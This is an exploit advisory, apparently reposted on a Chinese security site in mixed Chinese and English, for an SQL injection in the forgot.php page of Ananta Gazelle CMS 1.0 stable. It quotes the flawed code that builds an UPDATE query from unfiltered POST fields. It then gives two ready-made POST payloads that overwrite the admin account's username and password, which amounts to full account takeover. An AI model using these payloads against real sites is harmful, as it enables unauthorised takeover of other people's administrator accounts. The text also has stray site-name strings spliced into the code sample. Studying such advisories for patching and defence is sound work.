表头: Ananta Gazelle CMS - Update Statement Sql injection 作者: hackme 下载 地址: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/Ananta_Gazelle1.0.zip/ 影响版本: 1.0 stable 测试平台: backbox 2.1 [先为我差劲的英语致歉] [+] 这个注射不允许我们读取表内容, but to do the update statement of the username and password of admin. Since you can't enter a special chars as the apex, and then we don't change the username and password in what we want, we will copy the value of a column with default value in column username and password. 事实上我们已经: admin - username = 1 - password = 1 [+] 缺陷代码分析(forgot.php): [CODE] if (!empty($_POST) && !isset($_POST["loginform"])) { // form submitted, set a new activation key for this user (however don't set the user to inactive, so no-one can block someone else's account $sql = "UPDATE ".$tableprefix.$_POST["table"]." SET "; if ($_POST["activate"] <> "") { $sql = $sql."activate='".$_POST["activate"]."'"; } $sql = $sql." WHERE email"."='".$_POST["email"]."'"; // HdhCmsTest2cto测试数据 no control if ( mysql _query($sql)) { [/code] [+] default table users columns: number,name,pass,email,activate,active,admin,joindate,showemail 风险等级:高 [+]缺陷页面: HdhCmsTest2cto测试数据 /ananta/forgot.php [+] Change admin username in "1" [POST-DATA] email=&save=Save&table=users SET name=active where number=1--&activate=lol&location=/ananta/forgot.php [+] Change admin password in "1" [POST-DATA] email=v&save=Save&table=users SET pass=md5(active) where number=1--&activate=lol&location=/ananta/forgot.php [+]...如果你想, 你就能 [+] Greetz To: MZ
查看更多关于Ananta Gazelle CMS 上传语句注射及修复 - 网站安全的详细内容...